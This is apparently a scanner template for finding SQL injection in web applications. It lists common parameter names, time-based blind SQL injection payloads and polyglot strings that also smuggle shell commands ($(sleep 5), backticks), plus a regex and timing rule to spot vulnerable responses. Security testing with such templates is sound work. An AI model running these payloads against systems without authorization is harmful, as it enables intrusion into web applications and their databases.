id: sqli-01
type: fuzz
level: 2
info:
  name: SQL Injection on Parameter 02
  risk: High

variables:
  - name: |
      id
      action
      page
      name
      password
      url
      email
      type
      username
      file
      title
      code
      q
      submit
      user
      token
      delete
      message
      t
      c
      data
      mode
      order
      lang
      p
      key
      status
      start
      charset
      description
      s
      post
      next
      login
      search
      content
      comment
      step
      ajax
      debug
      state
      query
      f
      error
      save
      sort
      format
      tab
      offset
      edit
      preview
      filter
      update
      from
      view
      a
      limit
      do
      plugin
      theme
      text
      test
      path
      language

payloads:
  - >-
    '
  - >-
    -
  - >-
    %
  - >-
    \"
  - >-
    `
  - >-
    %25%27%25%22
  - >-
    %u0027%u0022
  - >-
    %c0%a7
  - >-
    %0aa%0db
  - >-
    1e309
  - >-
    char(0x27)char(0x27)
  - >-
    %u2018
  - >-
    /*
  - >-
    sleep(1)
  - >-
    SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
  - >-
    SLEEP(1) /*' or SLEEP(1) or '\" or SLEEP(1) or \"*/
  - >-
    IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR\"*/
  - >-
    if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/
  - >-
    /*$(sleep 5)`sleep 5``*/-sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'\"||sleep(5)||\"`
  - >-
    /*$(sleep 5)`sleep 5``*/sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'\"||sleep(5)||\"`

requests:
  - generators:
      - Query("[[.original]]{{.payload}}", "{{.name}}")
    detections:
      - >-
       RegexSearch("response", "mysql_fetch_|not a valid MySQL|not a legal PLSQL identifer|mysql_connect\(\)|(SELECT\s+[^:>]+\sFROM\s+[^:>]+\sWHERE\s+)|(at\s[[:alnum:]\/\._]+\sline\s\d+)|ociparse\(\):|must be a syntactically valid variable|CFSQLTYPE|Unknown column '|Microsoft OLE DB Provider for SQL|SQL QUERY FAILURE:|Syntax error.{1,50}in query|You have an error in your SQL syntax|Unclosed quotation mark") || ResponseTime() > 8
